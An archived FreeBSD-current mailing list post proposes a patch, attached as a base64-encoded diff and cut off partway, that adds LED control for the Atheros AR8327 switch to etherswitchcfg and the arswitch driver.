MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 09:12:33 -0000 See From owner-freebsd-current@freebsd.org Sat Jul 30 06:14:00 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 121D9BA8DF1 for ; Sat, 30 Jul 2016 06:14:00 +0000 (UTC) (envelope-from dnelson_1901@yahoo.com) Received: from nm36-vm9.bullet.mail.gq1.yahoo.com (nm36-vm9.bullet.mail.gq1.yahoo.com [98.136.216.170]) (using TLSv1 with cipher ECDHE-RSA-RC4-SHA (128/128 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id CEA0311DE for ; Sat, 30 Jul 2016 06:13:59 +0000 (UTC) (envelope-from dnelson_1901@yahoo.com) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s2048; t=1469859233; bh=3M2SpQjIb7fI2mWbQ7scpE8K7/OGZl1Uqio31d9om6o=; h=Date:From:Reply-To:To:Subject:References:From:Subject; b=LhIrE2QyHjmtM37D7q1tgZihZlVXhmqa9IgHZ18N5abfWYpGDp1qtR+JvKRFDtYeTOxofxmhjxz2dXTutkEnvefyobEYchJ3nJfQFFxTigydTfEe9wlFDNXlPRhGToTZjg+4IWN4LRz3LFP79v9YtHmVYEq+D9ynsHorlZpy8j2nKLDG6KLx9x0ePLvr4Du8lZ6RW187FndhF9OvOs5QbnazRbVnJb4wzhSFLfM23prGhKYaLtl8oclIyJGcp2vw1BAOkpIEjZtoIarJJYt7tDZSY3AViDT3NA693Rv576CVzpwQ80yx3dNUXhSmE36I+E97mWhF4XYSWuQFUWOF1Q== Received: from [127.0.0.1] by nm36.bullet.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 06:13:53 -0000 Received: from [98.137.12.57] by nm36.bullet.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 06:11:04 -0000 Received: from [98.137.12.222] by tm2.bullet.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 06:11:04 -0000 Received: from [127.0.0.1] by omp1030.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 06:11:04 -0000 X-Yahoo-Newman-Property: ymail-4 X-Yahoo-Newman-Id: 202770.6320.bm@omp1030.mail.gq1.yahoo.com X-YMail-OSG: isCAG2kVM1mm.yBGULmaD8kMsohZz6KtwPl4L_4g3lNDzGkJR1YpyUKjyifczLD nfxmLaEMCZn8Y0zepzImYeDGEWstKo9UQ7_we6OGlQ_hMCHM9ROBwyG3lIvAgyZfm0v1LUKKQzOk v1VBYZKzfjplJxaJasarG1Ki36fBmxD23._dMCA9wMRqpRwzThWFiw16YSakHNzlCQqg0duAXwZ_ UQ3m.TA7S3YO01HLDckLmbIvjNZp_GZJ_jNPkslARlYaEkcQZ31c2MASf646ytxD1rSVaGelChzq yJih1xgby.2G5ZF9WN1qD4cTIIIDCybfZ5R98.XcRZpYzwMAk_qefm0zan76ENrzX8U91McC_oRl kHRkg2PcB_JA76U.oFu7RTlgDZPVTNvqvDjOunclgDoivsWth1Xn5cWHzcd17HiAszPaVzttapgN wYcMvURIvtBvk1Nz7BHpkEOx17.La91bMdIxL8FQXKgQap9p5aqznCjCowD8IpO14udns2RWQTW. UitUzYUZdhVokn.4znnEufOcnZuHgIuEr82j.Qm98ojB4ToDgMQ7HRIZt2PUrxGQcq8mAgQ-- Received: from jws10765.mail.gq1.yahoo.com by sendmailws777.mail.gq1.yahoo.com; Sat, 30 Jul 2016 06:11:03 +0000; 1469859063.737 Date: Sat, 30 Jul 2016 06:11:03 +0000 (UTC) From: Dan Nelson Reply-To: Dan Nelson To: "freebsd-current@freebsd.org" Message-ID: <315070490.8622006.1469859063414.JavaMail.yahoo@mail.yahoo.com> Subject: AR8327 Etherswitch led control patch MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_Part_8622005_1358949567.1469859063414" References: <315070490.8622006.1469859063414.JavaMail.yahoo.ref@mail.yahoo.com> X-Mailman-Approved-At: Sat, 30 Jul 2016 11:56:28 +0000 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 06:14:00 -0000 ------=_Part_8622005_1358949567.1469859063414 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit I got a TP-Link WDR4300 recently, flashed it to FreeBSD, and decided that I needed to be able to control all the LEDs on the front :) As a start, attached is a patch that allows you to manage the five LEDs connected to the Atheros AR8327 switch chip it uses. It extends the etherswitch API, allowing up to three LEDs per port to be set to on, off, cyclic blink, or default (flash on activity for the 8327). I added an "led" subcommand to the etherswitchcfg tool for full control, and also added led(4) nodes for basic on/off control. This particular switch seems to only notice changes to the LED registers twice per second, so it's no good for smooth animation, but it works just fine as a 5-bit progress bar or error display. This does break ABI compatibility of the etherswitch ioctl because of new elements in the structure. The code should be generic enough to apply easily to other etherswitch chips. Comments and suggestions welcome. -- Dan Nelson dnelson_1901@yahoo.com ------=_Part_8622005_1358949567.1469859063414 Content-Type: text/plain Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=etherswitch.diff Content-ID: <70a48cda-e56d-13b2-1a5b-1086bb66ee24@yahoo.com> SW5kZXg6IHNiaW4vZXRoZXJzd2l0Y2hjZmcvZXRoZXJzd2l0Y2hjZmcuOAo9PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Ci0t LSBzYmluL2V0aGVyc3dpdGNoY2ZnL2V0aGVyc3dpdGNoY2ZnLjgJKHJldmlzaW9uIDMwMzUzOCkK KysrIHNiaW4vZXRoZXJzd2l0Y2hjZmcvZXRoZXJzd2l0Y2hjZmcuOAkod29ya2luZyBjb3B5KQpA QCAtMzMsMjYgKzMzLDI2IEBACiAuU2ggU1lOT1BTSVMKIC5ObQogLk9wIEZsICJmIGNvbnRyb2wg ZmlsZSIKLS5BciBpbmZvCisuQ20gaW5mbwogLk5tCiAuT3AgRmwgImYgY29udHJvbCBmaWxlIgot LkFyIGNvbmZpZworLkNtIGNvbmZpZwogLkFyIGNvbW1hbmQgcGFyYW1ldGVyCiAuTm0KIC5PcCBG bCAiZiBjb250cm9sIGZpbGUiCi0uQXIgcGh5CisuQ20gcGh5CiAuQXIgcGh5LnJlZ2lzdGVyWz12 YWx1ZV0KIC5ObQogLk9wIEZsICJmIGNvbnRyb2wgZmlsZSIKLS5BciBwb3J0JWQKKy5DbSBwb3J0 JWQKIC5BciBbZmxhZ3NdIGNvbW1hbmQgcGFyYW1ldGVyCiAuTm0KIC5PcCBGbCAiZiBjb250cm9s IGZpbGUiCi0uQXIgcmVnCisuQ20gcmVnCiAuQXIgcmVnaXN0ZXJbPXZhbHVlXQogLk5tCiAuT3Ag RmwgImYgY29udHJvbCBmaWxlIgotLkFyIHZsYW5ncm91cCVkCisuQ20gdmxhbmdyb3VwJWQKIC5B ciBjb21tYW5kIHBhcmFtZXRlcgogLlNoIERFU0NSSVBUSU9OCiBUaGUKQEAgLTgxLDggKzgxLDgg QEAgVGhlIGNvbmZpZyBjb21tYW5kIHByb3ZpZGVzIGFjY2VzcyB0byBnbG9iYWwgc3dpdGMKIHBh cmFtZXRlcnMuCiBJdCBzdXBwb3J0IHRoZSBmb2xsb3dpbmcgY29tbWFuZHM6CiAuUHAKLS5CbCAt dGFnIC13aWR0aCAiLkFyIHZsYW5fbW9kZSBtb2RlIiAtY29tcGFjdAotLkl0IEFyIHZsYW5fbW9k ZSBtb2RlCisuQmwgLXRhZyAtd2lkdGggIi5DbSB2bGFuX21vZGUgbW9kZSIgLWNvbXBhY3QKKy5J dCBDbSB2bGFuX21vZGUgQXIgbW9kZQogU2V0cyB0aGUgc3dpdGNoIFZMQU4gbW9kZSAoZGVwZW5k cyBvbiB0aGUgaGFyZHdhcmUpLgogLkVsCiAuU3MgcGh5CkBAIC0xMDMsNTEgKzEwMyw2MCBAQCBU aGUgcG9ydCBjb21tYW5kIHNlbGVjdHMgb25lIG9mIHRoZSBwb3J0cyBvZiB0aGUgcwogSXQgc3Vw cG9ydHMgdGhlIGZvbGxvd2luZyBjb21tYW5kczoKIC5QcAogLkJsIC10YWcgLXdpZHRoICIuQXIg cHZpZCBudW1iZXIiIC1jb21wYWN0Ci0uSXQgQXIgcHZpZCBudW1iZXIKKy5JdCBDbSBwdmlkIEFy IG51bWJlcgogU2V0cyB0aGUgZGVmYXVsdCBwb3J0IFZJRCB0aGF0IGlzIHVzZWQgdG8gcHJvY2Vz cyBpbmNvbWluZyBmcmFtZXMgdGhhdCBhcmUgbm90IHRhZ2dlZC4KLS5JdCBBciBtZWRpYSBtZWRp YXNwZWMKKy5JdCBDbSBtZWRpYSBBciBtZWRpYXNwZWMKIFNwZWNpZmllcyB0aGUgcGh5c2ljYWwg bWVkaWEgY29uZmlndXJhdGlvbiB0byBiZSBjb25maWd1cmVkIGZvciBhIHBvcnQuCi0uSXQgQXIg bWVkaWFvcHQgbWVkaWFvcHRpb24KKy5JdCBDbSBtZWRpYW9wdCBBciBtZWRpYW9wdGlvbgogU3Bl Y2lmaWVzIGEgbGlzdCBvZiBtZWRpYSBvcHRpb25zIGZvciBhIHBvcnQuCiBTZWUKIC5YciBpZmNv bmZpZyA4CiBmb3IgZGV0YWlscyBvbgotLkFyIG1lZGlhCisuQ20gbWVkaWEKIGFuZAotLkFyIG1l ZGlhb3B0IC4KKy5DbSBtZWRpYW9wdCAuCisuSXQgQ20gbGVkIEFyIG51bWJlciBzdHlsZQorU2V0 cyB0aGUgZGlzcGxheSBzdHlsZSBmb3IgYSBnaXZlbiBMRUQuICBBdmFpbGFibGUgc3R5bGVzIGFy ZTogCisuQ20gZGVmYXVsdCAKKyh1c3VhbGx5IGZsYXNoIG9uIGFjdGl2aXR5KSwKKy5DbSBvbiAs IAorLkNtIG9mZiAsIAorYW5kIAorLkNtIGJsaW5rIC4KK05vdCBhbGwgc3dpdGNoZXMgd2lsbCBz dXBwb3J0IGFsbCBzdHlsZXMuCiAuRWwKIC5QcAogQW5kIHRoZSBmb2xsb3dpbmcgZmxhZ3MgKHBs ZWFzZSBub3RlIHRoYXQgbm90IGFsbCBmbGFncwogYXJlIHN1cHBvcnRlZCBieSBhbGwgc3dpdGNo IGRyaXZlcnMpOgogLlBwCi0uQmwgLXRhZyAtd2lkdGggIi5BciBhZGR0YWciIC1jb21wYWN0Ci0u SXQgQXIgYWRkdGFnCisuQmwgLXRhZyAtd2lkdGggIi5GbCBhZGR0YWciIC1jb21wYWN0CisuSXQg Q20gYWRkdGFnCiBBZGQgVkxBTiB0YWcgdG8gZWFjaCBwYWNrZXQgc2VudCBieSB0aGUgcG9ydC4K LS5JdCBBciAtYWRkdGFnCisuSXQgRmwgYWRkdGFnCiBEaXNhYmxlIHRoZSBhZGQgVkxBTiB0YWcg b3B0aW9uLgotLkl0IEFyIHN0cmlwdGFnCisuSXQgQ20gc3RyaXB0YWcKIFN0cmlwIHRoZSBWTEFO IHRhZ3MgZnJvbSB0aGUgcGFja2V0cyBzZW50IGJ5IHRoZSBwb3J0LgotLkl0IEFyIC1zdHJpcHRh ZworLkl0IEZsIHN0cmlwdGFnCiBEaXNhYmxlIHRoZSBzdHJpcCBWTEFOIHRhZyBvcHRpb24uCi0u SXQgQXIgZmlyc3Rsb2NrCisuSXQgQ20gZmlyc3Rsb2NrCiBUaGlzIG9wdGlvbnMgbWFrZXMgdGhl IHN3aXRjaCBwb3J0IGxvY2sgb24gdGhlIGZpcnN0IE1BQyBhZGRyZXNzIGl0IHNlZXMuCiBBZnRl ciB0aGF0LCB1c3VhbGx5IHlvdSBuZWVkIHRvIHJlc2V0IHRoZSBzd2l0Y2ggdG8gbGVhcm4gZGlm ZmVyZW50CiBNQUMgYWRkcmVzc2VzLgotLkl0IEFyIC1maXJzdGxvY2sKKy5JdCBGbCBmaXJzdGxv Y2sKIERpc2FibGUgdGhlIGZpcnN0IGxvY2sgb3B0aW9uLgogTm90ZSB0aGF0IHNvbWV0aW1lcyB5 b3UgbmVlZCB0byByZXNldCB0aGUKIHN3aXRjaCB0byByZWFsbHkgZGlzYWJsZSB0aGlzIG9wdGlv bi4KLS5JdCBBciBkcm9wdW50YWdnZWQKKy5JdCBDbSBkcm9wdW50YWdnZWQKIERyb3AgcGFja2V0 cyB3aXRob3V0IGEgVkxBTiB0YWcuCi0uSXQgQXIgLWRyb3B1bnRhZ2dlZAorLkl0IEZsIGRyb3B1 bnRhZ2dlZAogRGlzYWJsZSB0aGUgZHJvcCB1bnRhZ2dlZCBwYWNrZXRzIG9wdGlvbi4KLS5JdCBB ciBkb3VibGV0YWcKKy5JdCBDbSBkb3VibGV0YWcKIEVuYWJsZSBRaW5RIGZvciB0aGUgcG9ydC4K LS5JdCBBciAtZG91YmxldGFnCisuSXQgRmwgZG91YmxldGFnCiBEaXNhYmxlIFFpblEgZm9yIHRo ZSBwb3J0LgotLkl0IEFyIGluZ3Jlc3MKKy5JdCBDbSBpbmdyZXNzCiBFbmFibGUgdGhlIGluZ3Jl c3MgZmlsdGVyIG9uIHRoZSBwb3J0LgotLkl0IEFyIC1pbmdyZXNzCisuSXQgRmwgaW5ncmVzcwog RGlzYWJsZSB0aGUgaW5ncmVzcyBmaWx0ZXIuCiAuRWwKIC5TcyByZWcKQEAgLTE1NiwxNCArMTY1 LDE0IEBAIFRoZSByZWcgY29tbWFuZCBwcm92aWRlcyBhY2Nlc3MgdG8gdGhlIHJlZ2lzdGVycyBv CiBUaGUgdmxhbmdyb3VwIGNvbW1hbmQgc2VsZWN0cyBvbmUgb2YgdGhlIFZMQU4gZ3JvdXBzIGZv ciBjb25maWd1cmF0aW9uLgogSXQgc3VwcG9ydHMgdGhlIGZvbGxvd2luZyBjb21tYW5kczoKIC5Q cAotLkJsIC10YWcgLXdpZHRoICIuQXIgdmxhbmdyb3VwIiAtY29tcGFjdAotLkl0IEFyIHZsYW4g VklECisuQmwgLXRhZyAtd2lkdGggIi5DbSBtZW1iZXJzIiAtY29tcGFjdAorLkl0IENtIHZsYW4g QXIgVklECiBTZXRzIHRoZSBWTEFOIElEICg4MDIuMXEgVklEKSBmb3IgdGhpcyBWTEFOIGdyb3Vw LgogRnJhbWVzIHRyYW5zbWl0dGVkIG9uIHRhZ2dlZCBtZW1iZXIgcG9ydHMgb2YgdGhpcyBncm91 cCB3aWxsIGJlIHRhZ2dlZAogd2l0aCB0aGlzIFZJRC4KIEluY29taW5nIGZyYW1lcyBjYXJyeWlu ZyB0aGlzIHRhZyB3aWxsIGJlIGZvcndhcmRlZCBhY2NvcmRpbmcgdG8gdGhlCiBjb25maWd1cmF0 aW9uIG9mIHRoaXMgVkxBTiBncm91cC4KLS5JdCBBciBtZW1iZXJzIHBvcnQsLi4uCisuSXQgQ20g bWVtYmVycyBBciBwb3J0LC4uLgogQ29uZmlndXJlcyB3aGljaCBwb3J0cyBhcmUgdG8gYmUgYSBt ZW1iZXIgb2YgdGhpcyBWTEFOIGdyb3VwLgogVGhlIHBvcnQgbnVtYmVycyBhcmUgZ2l2ZW4gYXMg YSBjb21tYS1zZXBhcmF0ZWQgbGlzdC4KIEVhY2ggcG9ydCBjYW4gb3B0aW9uYWxseSBiZSBmb2xs b3dlZCBieQpJbmRleDogc2Jpbi9ldGhlcnN3aXRjaGNmZy9ldGhlcnN3aXRjaGNmZy5jCj09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT0KLS0tIHNiaW4vZXRoZXJzd2l0Y2hjZmcvZXRoZXJzd2l0Y2hjZmcuYwkocmV2aXNpb24g MzAzNTM4KQorKysgc2Jpbi9ldGhlcnN3aXRjaGNmZy9ldGhlcnN3aXRjaGNmZy5jCSh3b3JraW5n IGNvcHkpCkBAIC04Myw2ICs4Myw4IEBAIHN0cnVjdCBjbWRzIHsKIH07CiBzdGF0aWMgc3RydWN0 IGNtZHMgY21kc1tdOwogCisvKiBNdXN0IG1hdGNoIHRoZSBFVEhFUlNXSVRDSF9QT1JUX0xFRF8q IGVudW0gb3JkZXIgKi8KK3N0YXRpYyBjb25zdCBjaGFyICpsZWRzdHlsZXNbXSA9IHsgImRlZmF1 bHQiLCAib24iLCAib2ZmIiwgImJsaW5rIiwgTlVMTCB9OwogCiAvKgogICogUHJpbnQgYSB2YWx1 ZSBhIGxhIHRoZSAlYiBmb3JtYXQgb2YgdGhlIGtlcm5lbCdzIHByaW50Zi4KQEAgLTI3MCw2ICsy NzIsMzggQEAgc2V0X3BvcnRfbWVkaWFvcHQoc3RydWN0IGNmZyAqY2ZnLCBjaGFyICphcmd2W10p CiB9CiAKIHN0YXRpYyB2b2lkCitzZXRfcG9ydF9sZWQoc3RydWN0IGNmZyAqY2ZnLCBjaGFyICph cmd2W10pCit7CisJZXRoZXJzd2l0Y2hfcG9ydF90IHA7CisJaW50IGxlZDsKKwlpbnQgaTsKKwkK KwliemVybygmcCwgc2l6ZW9mKHApKTsKKwlwLmVzX3BvcnQgPSBjZmctPnVuaXQ7CisJaWYgKGlv Y3RsKGNmZy0+ZmQsIElPRVRIRVJTV0lUQ0hHRVRQT1JULCAmcCkgIT0gMCkKKwkJZXJyKEVYX09T RVJSLCAiaW9jdGwoSU9FVEhFUlNXSVRDSEdFVFBPUlQpIik7CisKKwlsZWQgPSBzdHJ0b2woYXJn dlsxXSwgTlVMTCwgMCk7CisJaWYgKGxlZCA8IDEgfHwgbGVkID4gcC5lc19ubGVkcykKKwkJZXJy eChFWF9VU0FHRSwgImludmFsaWQgbGVkIG51bWJlciAlczsgbXVzdCBiZSBiZXR3ZWVuIDEgYW5k ICVkIiwKKwkJCWFyZ3ZbMV0sIHAuZXNfbmxlZHMpOworCisJbGVkLS07CisKKwlmb3IgKGk9MDsg bGVkc3R5bGVzW2ldICE9IE5VTEw7IGkrKykgeworCQlpZiAoc3RyY21wKGFyZ3ZbMl0sIGxlZHN0 eWxlc1tpXSkgPT0gMCkgeworCQkJcC5lc19sZWRbbGVkXSA9IGk7CisJCQlicmVhazsKKwkJfQor CX0gCisJaWYgKGxlZHN0eWxlc1tpXSA9PSBOVUxMKQorCQllcnJ4KEVYX1VTQUdFLCAiaW52YWxp ZCBsZWQgc3R5bGUgXCIlc1wiIiwgYXJndlsyXSk7CisKKwlpZiAoaW9jdGwoY2ZnLT5mZCwgSU9F VEhFUlNXSVRDSFNFVFBPUlQsICZwKSAhPSAwKQorCQllcnIoRVhfT1NFUlIsICJpb2N0bChJT0VU SEVSU1dJVENIU0VUUE9SVCkiKTsKK30KKworc3RhdGljIHZvaWQKIHNldF92bGFuZ3JvdXBfdmlk KHN0cnVjdCBjZmcgKmNmZywgY2hhciAqYXJndltdKQogewogCWludCB2OwpAQCAtMzM0LDEwICsz NjgsMTAgQEAgc2V0X3JlZ2lzdGVyKHN0cnVjdCBjZmcgKmNmZywgY2hhciAqYXJnKQogCWlmIChj PT1hcmcpCiAJCXJldHVybiAoMSk7CiAJaWYgKCpjID09ICc9JykgewotCQl2ID0gc3RydG9sKGMr MSwgTlVMTCwgMCk7CisJCXYgPSBzdHJ0b3VsKGMrMSwgTlVMTCwgMCk7CiAJCXdyaXRlX3JlZ2lz dGVyKGNmZywgYSwgdik7CiAJfQotCXByaW50ZigiXHRyZWcgMHglMDR4PTB4JTA0eFxuIiwgYSwg cmVhZF9yZWdpc3RlcihjZmcsIGEpKTsKKwlwcmludGYoIlx0cmVnIDB4JTA0eD0weCUwOHhcbiIs IGEsIHJlYWRfcmVnaXN0ZXIoY2ZnLCBhKSk7CiAJcmV0dXJuICgwKTsKIH0KIApAQCAtMzU3LDcg KzM5MSw3IEBAIHNldF9waHlyZWdpc3RlcihzdHJ1Y3QgY2ZnICpjZmcsIGNoYXIgKmFyZykKIAlp ZiAoZCA9PSBjKQogCQlyZXR1cm4gKDEpOwogCWlmICgqYyA9PSAnPScpIHsKLQkJdmFsID0gc3Ry dG9sKGMrMSwgTlVMTCwgMCk7CisJCXZhbCA9IHN0cnRvdWwoYysxLCBOVUxMLCAwKTsKIAkJd3Jp dGVfcGh5cmVnaXN0ZXIoY2ZnLCBwaHksIHJlZywgdmFsKTsKIAl9CiAJcHJpbnRmKCJcdHJlZyAl ZC4weCUwMng9MHglMDR4XG4iLCBwaHksIHJlZywgcmVhZF9waHlyZWdpc3RlcihjZmcsIHBoeSwg cmVnKSk7CkBAIC00NDIsNiArNDc2LDEzIEBAIHByaW50X3BvcnQoc3RydWN0IGNmZyAqY2ZnLCBp bnQgcG9ydCkKIAkJcHJpbnRmKCJcdHB2aWQ6ICVkXG4iLCBwLmVzX3B2aWQpOwogCXByaW50Yigi XHRmbGFncyIsIHAuZXNfZmxhZ3MsIEVUSEVSU1dJVENIX1BPUlRfRkxBR1NfQklUUyk7CiAJcHJp bnRmKCJcbiIpOworCWlmIChwLmVzX25sZWRzKSB7CisJCXByaW50ZigiXHRsZWQ6ICIpOworCQlm b3IgKGkgPSAwOyBpIDwgcC5lc19ubGVkczsgaSsrKSB7CisJCQlwcmludGYoIiVkOiVzJXMiLCBp KzEsIGxlZHN0eWxlc1twLmVzX2xlZFtpXV0sIChpPT1wLmVzX25sZWRzLTEpPyIiOiIgIik7CisJ CX0KKwkJcHJpbnRmKCJcbiIpOworCX0KIAlwcmludGYoIlx0bWVkaWE6ICIpOwogCXByaW50X21l ZGlhX3dvcmQocC5lc19pZm1yLmlmbV9jdXJyZW50LCAxKTsKIAlpZiAocC5lc19pZm1yLmlmbV9h Y3RpdmUgIT0gcC5lc19pZm1yLmlmbV9jdXJyZW50KSB7CkBAIC01NDAsNyArNTgxLDcgQEAgdXNh Z2Uoc3RydWN0IGNmZyAqY2ZnIF9fdW51c2VkLCBjaGFyICphcmd2W10gX191bnUKIAkgICAgInBo eS5yZWdpc3Rlcls9dmFsdWVdXG4iKTsKIAlmcHJpbnRmKHN0ZGVyciwgIlx0ZXRoZXJzd2l0Y2hj ZmcgWy1mIGNvbnRyb2wgZmlsZV0gcG9ydFggIgogCSAgICAiW2ZsYWdzXSBjb21tYW5kIHBhcmFt ZXRlclxuIik7Ci0JZnByaW50ZihzdGRlcnIsICJcdFx0cG9ydCBjb21tYW5kczogcHZpZCwgbWVk aWEsIG1lZGlhb3B0XG4iKTsKKwlmcHJpbnRmKHN0ZGVyciwgIlx0XHRwb3J0IGNvbW1hbmRzOiBw dmlkLCBtZWRpYSwgbWVkaWFvcHQsIGxlZFxuIik7CiAJZnByaW50ZihzdGRlcnIsICJcdGV0aGVy c3dpdGNoY2ZnIFstZiBjb250cm9sIGZpbGVdIHJlZyAiCiAJICAgICJyZWdpc3Rlcls9dmFsdWVd XG4iKTsKIAlmcHJpbnRmKHN0ZGVyciwgIlx0ZXRoZXJzd2l0Y2hjZmcgWy1mIGNvbnRyb2wgZmls ZV0gdmxhbmdyb3VwWCAiCkBAIC02NTEsNyArNjkyLDcgQEAgbWFpbihpbnQgYXJnYywgY2hhciAq YXJndltdKQogCQkJZm9yKGk9MDsgY21kc1tpXS5uYW1lICE9IE5VTEw7IGkrKykgewogCQkJCWlm IChjZmcubW9kZSA9PSBjbWRzW2ldLm1vZGUgJiYgc3RyY21wKGFyZ3ZbMF0sIGNtZHNbaV0ubmFt ZSkgPT0gMCkgewogCQkJCQlpZiAoYXJnYyA8IChjbWRzW2ldLmFyZ3MgKyAxKSkgewotCQkJCQkJ cHJpbnRmKCIlcyBuZWVkcyBhbiBhcmd1bWVudFxuIiwgY21kc1tpXS5uYW1lKTsKKwkJCQkJCXBy aW50ZigiJXMgbmVlZHMgJWQgYXJndW1lbnQlc1xuIiwgY21kc1tpXS5uYW1lLCBjbWRzW2ldLmFy Z3MsIChjbWRzW2ldLmFyZ3M9PTEpPyIiOiIsIik7CiAJCQkJCQlicmVhazsKIAkJCQkJfQogCQkJ CQkoY21kc1tpXS5mKSgmY2ZnLCBhcmd2KTsKQEAgLTY5MSw2ICs3MzIsNyBAQCBzdGF0aWMgc3Ry dWN0IGNtZHMgY21kc1tdID0gewogCXsgTU9ERV9QT1JULCAicHZpZCIsIDEsIHNldF9wb3J0X3Zp ZCB9LAogCXsgTU9ERV9QT1JULCAibWVkaWEiLCAxLCBzZXRfcG9ydF9tZWRpYSB9LAogCXsgTU9E RV9QT1JULCAibWVkaWFvcHQiLCAxLCBzZXRfcG9ydF9tZWRpYW9wdCB9LAorCXsgTU9ERV9QT1JU LCAibGVkIiwgMiwgc2V0X3BvcnRfbGVkIH0sCiAJeyBNT0RFX1BPUlQsICJhZGR0YWciLCAwLCBz ZXRfcG9ydF9mbGFnIH0sCiAJeyBNT0RFX1BPUlQsICItYWRkdGFnIiwgMCwgc2V0X3BvcnRfZmxh ZyB9LAogCXsgTU9ERV9QT1JULCAiaW5ncmVzcyIsIDAsIHNldF9wb3J0X2ZsYWcgfSwKSW5kZXg6 IHN5cy9kZXYvZXRoZXJzd2l0Y2gvYXJzd2l0Y2gvYXJzd2l0Y2guYwo9PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Ci0tLSBz eXMvZGV2L2V0aGVyc3dpdGNoL2Fyc3dpdGNoL2Fyc3dpdGNoLmMJKHJldmlzaW9uIDMwMzUzOCkK KysrIHN5cy9kZXYvZXRoZXJzd2l0Y2gvYXJzd2l0Y2gvYXJzd2l0Y2guYwkod29ya2luZyBjb3B5 KQpAQCAtNjksNiArNjksOCBAQAogI2luY2x1ZGUgPGRldi9ldGhlcnN3aXRjaC9hcnN3aXRjaC9h cnN3aXRjaF84MzI3Lmg+CiAjaW5jbHVkZSA8ZGV2L2V0aGVyc3dpdGNoL2Fyc3dpdGNoL2Fyc3dp dGNoXzkzNDAuaD4KIAorI2luY2x1ZGUgPGRldi9sZWQvbGVkLmg+CisKICNpbmNsdWRlICJtZGlv X2lmLmgiCiAjaW5jbHVkZSAibWlpYnVzX2lmLmgiCiAjaW5jbHVkZSAiZXRoZXJzd2l0Y2hfaWYu aCIKQEAgLTc3LDYgKzc5LDE0IEBACiBzdGF0aWMgU1lTQ1RMX05PREUoX2RlYnVnLCBPSURfQVVU TywgYXJzd2l0Y2gsIENUTEZMQUdfUkQsIDAsICJhcnN3aXRjaCIpOwogI2VuZGlmCiAKKy8qIE1h cCBFVEhFUlNXSVRDSF9QT1JUX0xFRF8qIHRvIEF0aGVyb3MgcGF0dGVybiBjb2RlcyAqLworc3Rh dGljIGludCBsZWRfcGF0dGVybl90YWJsZVtdID0geyAKKwlbRVRIRVJTV0lUQ0hfUE9SVF9MRURf REVGQVVMVF0gPSAweDMsIAorCVtFVEhFUlNXSVRDSF9QT1JUX0xFRF9PTl0gPSAweDIsIAorCVtF VEhFUlNXSVRDSF9QT1JUX0xFRF9PRkZdID0gMHgwLCAKKwlbRVRIRVJTV0lUQ0hfUE9SVF9MRURf QkxJTktdID0gMHgxIAorfTsKKwogc3RhdGljIGlubGluZSBpbnQgYXJzd2l0Y2hfcG9ydGZvcnBo eShpbnQgcGh5KTsKIHN0YXRpYyB2b2lkIGFyc3dpdGNoX3RpY2sodm9pZCAqYXJnKTsKIHN0YXRp YyBpbnQgYXJzd2l0Y2hfaWZtZWRpYV91cGQoc3RydWN0IGlmbmV0ICopOwpAQCAtODUsNiArOTUs OSBAQCBzdGF0aWMgaW50IGFyOHh4eF9wb3J0X3ZsYW5fc2V0dXAoc3RydWN0IGFyc3dpdGNoXwog ICAgIGV0aGVyc3dpdGNoX3BvcnRfdCAqcCk7CiBzdGF0aWMgaW50IGFyOHh4eF9wb3J0X3ZsYW5f Z2V0KHN0cnVjdCBhcnN3aXRjaF9zb2Z0YyAqc2MsCiAgICAgZXRoZXJzd2l0Y2hfcG9ydF90ICpw KTsKK3N0YXRpYyBpbnQgYXJzd2l0Y2hfc2V0bGVkKHN0cnVjdCBhcnN3aXRjaF9zb2Z0YyAqc2Ms IGludCBwaHksIGludCBsZWQsCisgICAgaW50IHN0eWxlKTsKK3N0YXRpYyB2b2lkIGFyc3dpdGNo X2xlZF9mdW5jKHN0cnVjdCBhcnN3aXRjaF9kZXZfbGVkICpkZXZfbGVkLCBpbnQgb25vZmYpOwog CiBzdGF0aWMgaW50CiBhcnN3aXRjaF9wcm9iZShkZXZpY2VfdCBkZXYpCkBAIC0xODgsOSArMjAx 